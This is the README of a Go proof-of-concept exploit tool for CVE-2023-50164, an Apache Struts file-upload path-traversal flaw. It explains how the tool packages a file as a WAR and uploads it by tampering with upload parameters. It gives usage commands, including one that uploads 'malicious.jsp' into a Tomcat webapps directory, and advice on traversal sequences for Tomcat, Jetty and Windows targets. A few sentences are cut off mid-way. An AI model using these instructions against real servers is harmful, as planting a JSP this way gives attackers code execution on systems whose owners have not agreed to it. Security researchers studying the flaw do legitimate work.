PoC for CVE-2023-50164


  To install this tool you must have Go version at least 1.20 installed and configured.

  $ go install

  Alternatively, you can compile it by DIY:
  $ git clone cve-2023-50164-poc/
  $ cd $_
  $ go build .

How it Works?

  This tool operates through a series of stages to execute the exploit.
  For instance, if your want to upload `/path/to/file-you-want-to-upload.txt` file, the tool proceeds as follows:

  1. It compresses the specified file into a WAR file, generating a `file-you-want-to-upload.war` in the
     OS-specific temporary directory. Thus, the tool assumes that the servlet context file path is

  2. It checks whether the servlet context file path already exists. If it does, the tool immediately returns an

  3. The tool attempts to upload the WAR file by manipulating file upload parameters.

  4. Subsequently, it double-checks the availability (status code 200) of the servlet context file path,
     indicating successful file upload.


    $ cve-2023-50164-poc -h

      PoC for CVE-2023-50164
      coded by @dwisiswant0

      cve-2023-50164-poc -u <URL> -f <FILE> -p <PATH>

      -u, --url <URL>             Specify the upload endpoint URL
      -f, --file <FILE>           Provide the payload file for uploading
      -t, --traverse-seq <N>      Generate traversal sequences N times (default: "0")
      -p, --path <PATH>           Specify the path to the accessible root directory
      -w, -win, --windows         Converts slash ("/") chars to Windows separator ("\")

      cve-2023-50164-poc -u http://host/path/to/upload.action -f foo.txt -t 1 -p webapps
      cve-2023-50164-poc -u http://host/upload/upload.action -f malicious.jsp -t 2 -p /opt/tomcat/webapps


  1. `jar` bin should be present in your system's $PATH.
  2. The target path should be accessible root path, such as `/var/lib/jetty/webapps` for Jetty or
     `/opt/tomcat/webapps` for Apache Tomcat.
  3. The default traversal sequences is zero ("0"), you can enter traverse sequences manually for the
     `-p`/`--path` flag value, e.g. `/../webapps` or `/../../opt/tomcat/webapps`. The traversal sequences will
     differ for each servlet.

  4. The `-w`/`-win`/`--windows` flag is exclusively employed when the servlet operates on a Windows server.


  Using this tool to attack targets without mutual consent is illegal. Users must follow local, state, and
  federal laws. The developer ("dwisiswant0"/"Dwi Siswanto") are NOT responsible for any damage caused by
  misuse of the tool.


  This tool is licensed under WTFPL v2 (DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE). See COPYING.